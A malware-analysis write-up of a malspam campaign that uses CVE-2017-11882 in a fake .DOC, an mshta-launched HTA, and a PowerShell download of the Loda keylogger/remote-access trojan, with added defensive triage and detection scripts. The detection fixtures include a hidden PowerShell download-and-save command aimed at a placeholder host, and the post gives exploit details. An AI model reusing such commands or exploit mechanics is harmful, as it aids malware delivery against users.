Every day we receive numerous phishing emails, and among them others that, although they do not directly attempt to steal user information, do carry a malicious attachment. These emails are what we usually call malspam (malware spam), which can be defined as the indiscriminate sending of emails with malicious attachments whose objective is to compromise the user’s computer. Once the PC is compromised, in some cases it can become part of a botnet, a network of computers that, without the knowledge of their users, perform actions managed from a remote central server operated by the botnet manager. These actions range from sending more malspam to the contacts of the compromised users to carrying out DDoS attacks on remote targets.
In the case we are going to analyse, the user received a suspicious email with an attached document that behaved strangely when it was opened, making connections to the Internet, something that is unusual in an office document. The attached document downloaded a script and executed it in the system. In turn, this script downloaded an executable file with malicious content.
Illustration 1. Infection process
In the case we’re studying, the infection was composed of 3 phases:
- Phase 1: Reception of the attachment, which exploited an Office vulnerability and triggered the download of a script.
- Phase 2: Execution of the script and download of the binary.
- Phase 3: Execution of the binary and compromise of the system.
In this post, we will try to analyse the different phases of the system being compromised and will identify the methods used in each one of them.
Phase 1: Attached document
The user receives an email in their inbox with an attachment that pretends to be a Microsoft Word document. These emails often come from user accounts that have been previously compromised, and from which multiple emails have been sent to their contacts’ email addresses.
The received attachment has a .DOC extension, but a more detailed analysis shows that it is actually an .RTF document, and that it contains an embedded Microsoft Office object; the file will still open in Microsoft Word.
Illustration 2. Document header (.rtf)
This .DOC document contains code created specifically to exploit a vulnerability in the Microsoft Office equation editor, Microsoft Equation 3.0 (CVE-2017-11882), which is used to execute a series of commands that download the second phase of the infection.
This vulnerability is a stack buffer overflow in the handling of one of the MTEF (MathType Equation Format) records used by the Microsoft Office equation editor. The overflow is performed with a string of characters that includes the command to be executed and a memory address (0x00430c12). This address refers to an instruction within the equation editor itself that calls the WinExec function of Kernel32.dll. The jump to that instruction uses as its parameter the stack record that has been overwritten and that now contains the command with the URL of the malicious file to execute, in our case http://urlz[.]fr/7lh3.
Illustration 3. Exploit used
Once the exploit is executed, we see the HTTP connection towards the outside, requesting the URL and following the redirection, then downloading the script followed by the binary.
Illustration 4. File download
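The first thing Phase 1 relies on is that the attachment is not what its extension claims: a .DOC that is really RTF carrying an embedded Equation Editor object. The following triage script is an added example (not code from the original post): it classifies a file by magic bytes rather than extension, decodes every hex-encoded \objdata group, and flags objects that carry the Equation Editor class name. The sample RTF is a constructed marker-only stub, not a working exploit document.

```python
import re

# Constructed sample: minimal RTF whose hex-encoded \objdata carries the ASCII
# class name "Equation.3" followed by an OLE2 header. Marker-only stub.
SAMPLE_RTF = (
    rb"{\rtf1\ansi{\object\objemb\objupdate{\*\objclass Equation.3}"
    rb"{\*\objdata 01050000020000000b0000004571756174696f6e2e33000000"
    rb"00000000000000000000d0cf11e0a1b11ae1}}}"
)

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # OLE2 compound file (legacy .doc)
RTF_MAGIC = b"{\\rtf"                              # RTF, whatever the extension says
ZIP_MAGIC = b"PK\x03\x04"                          # OOXML (.docx) is a zip container

def file_kind(data: bytes) -> str:
    """Classify by magic bytes, ignoring the extension the attachment carries."""
    head = data.lstrip()[:8]
    if head.startswith(RTF_MAGIC):
        return "rtf"
    if head.startswith(OLE_MAGIC):
        return "ole2"
    if head.startswith(ZIP_MAGIC):
        return "ooxml"
    return "unknown"

OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")

def objdata_blobs(data: bytes):
    """Yield the decoded binary payload of every \\objdata group in an RTF."""
    for m in OBJDATA_RE.finditer(data):
        hexstr = re.sub(rb"\s+", b"", m.group(1))
        if len(hexstr) % 2:
            hexstr = hexstr[:-1]          # tolerate a stray trailing nibble
        yield bytes.fromhex(hexstr.decode("ascii"))

def triage_rtf(data: bytes) -> dict:
    """Report whether an RTF embeds an auto-updating Equation Editor OLE object."""
    result = {"kind": file_kind(data), "objects": 0, "equation_object": False,
              "auto_update": b"\\objupdate" in data}
    if result["kind"] != "rtf":
        return result
    for blob in objdata_blobs(data):
        result["objects"] += 1
        # OLE1 object header and Equation.Native stream name both name the class
        if b"Equation.3" in blob or b"Equation.Native" in blob:
            result["equation_object"] = True
    return result
```

An RTF that is both `equation_object` and `auto_update` is worth quarantining for sandbox analysis before it reaches a mailbox.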
Phase 2: Script downloaded
When the vulnerability is exploited, an .HTA file is downloaded from an external website and executed using the mshta.exe utility.
The attackers use mshta.exe to launch the execution of the .HTA file, which in this case includes VBScript code.
Illustration 5. Execution of mshta.exe
As we can see, the HTA file’s code contains obfuscated parts, that is, the commands necessary to carry out the actions that will lead to the system being compromised are encoded in an apparently unintelligible way. These methods are usually used to avoid automatic detection of this type of script.
Illustration 6. .hta application
It is common for the authors of these types of documents to use different obfuscation techniques and, although in this case it is a simple obfuscation, at other times they use very elaborate methods.
When we deobfuscate the script code, we can see that it uses PowerShell to execute several commands that download a binary from an external website.
Illustration 7. Deobfuscated script
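Phases 1 and 2 together leave a distinctive process chain on the endpoint: the Equation Editor process spawns mshta.exe with a URL, and the HTA's VBScript launches PowerShell to fetch the binary. The script below is an added example (not from the original post) that runs a few detection rules over constructed process-creation events; it assumes the Equation Editor binary is EQNEDT32.EXE, and the paths and stage-two URL are placeholders rather than the real indicators.

```python
import re
from collections import namedtuple
from pathlib import PureWindowsPath

# One process-creation record: pid, parent pid, parent image, image, command line.
Event = namedtuple("Event", "pid ppid parent image cmdline")

# Constructed events modelled on the chain in this post. Placeholder paths/URL.
EQN = r"C:\Program Files\Common Files\Microsoft Shared\Equation\EQNEDT32.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    Event(880, 640, r"C:\Windows\System32\svchost.exe", EQN, "EQNEDT32.EXE -Embedding"),
    Event(912, 880, EQN, r"C:\Windows\System32\mshta.exe",
          "mshta http://stage2.example.invalid/7lh3"),
    Event(950, 912, r"C:\Windows\System32\mshta.exe", PS,
          "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
          "'http://stage2.example.invalid/File.exe','C:\\Users\\Public\\File.exe')\""),
    Event(988, 950, PS, r"C:\Users\Public\File.exe", "File.exe"),
    Event(1200, 640, r"C:\Windows\explorer.exe",
          r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE", "WINWORD.EXE /n"),
]

# PowerShell primitives commonly seen in download cradles.
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer|-enc", re.I)
SCRIPT_HOSTS = ("mshta.exe", "wscript.exe", "cscript.exe")

def base(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def rule_hits(ev: Event) -> list:
    """Return the names of every detection rule the event matches."""
    hits = []
    if base(ev.parent) == "eqnedt32.exe":            # Equation Editor never spawns children
        hits.append("equation_editor_child")
    if base(ev.image) == "mshta.exe" and re.search(r"https?://", ev.cmdline, re.I):
        hits.append("mshta_remote_hta")
    if base(ev.image) == "powershell.exe" and base(ev.parent) in SCRIPT_HOSTS:
        hits.append("script_host_spawned_powershell")
    if base(ev.image) == "powershell.exe" and DOWNLOAD_RE.search(ev.cmdline):
        hits.append("powershell_download_cradle")
    return hits

def infection_chain(events: list, pid: int) -> list:
    """Walk parent links from pid upward; return image basenames, root first."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(base(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return list(reversed(chain))

def triage(events: list) -> dict:
    """Map each flagged pid to the rules it triggered."""
    return {e.pid: hits for e in events if (hits := rule_hits(e))}
```

The first rule alone is enough to catch this chain in Sysmon or EDR process telemetry, since a legitimate Equation Editor session has no reason to start any child process.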
Phase 3: File.exe execution
The downloaded binary is a Windows executable packed with UPX. This kind of packing is frequently used by many malware families.
In this case, after looking up the binary’s hash in VirusTotal, we see that it had already been analysed and that, according to the antivirus detections, it is a Trojan, specifically Loda (Nymeria), written in AutoIT.
Illustration 8. Detections in VirusTotal
This Trojan collects information from the computer and acts both as a keylogger (it records every keystroke the user makes on the computer) and as a RAT (Remote Access Trojan), which allows the user’s computer to be controlled remotely.